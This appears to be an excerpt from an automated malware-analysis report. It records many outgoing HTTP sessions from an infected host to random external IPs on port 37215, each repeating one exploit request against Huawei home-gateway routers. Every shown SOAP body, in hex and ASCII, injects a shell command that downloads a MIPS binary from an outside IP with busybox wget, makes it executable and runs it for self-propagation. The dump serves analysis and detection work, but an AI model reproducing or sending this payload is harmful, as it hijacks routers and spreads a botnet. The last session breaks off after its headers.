                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1176192.168.2.233782641.239.179.3137215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:08.530606031 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1177192.168.2.2354688197.244.89.8837215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:08.530616045 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1178192.168.2.2353288197.151.203.14937215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:08.530626059 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1179192.168.2.2336652179.58.114.18637215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:08.530873060 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1180192.168.2.235665241.47.164.1737215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:08.530888081 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1181192.168.2.2339674107.245.90.21537215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:08.530888081 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1182192.168.2.236029241.218.185.5937215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:08.530941963 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1183192.168.2.2339728197.45.134.18337215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:08.530960083 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1184192.168.2.234876841.222.230.23537215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:08.530960083 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1185192.168.2.2355912157.41.221.25537215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:08.530976057 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
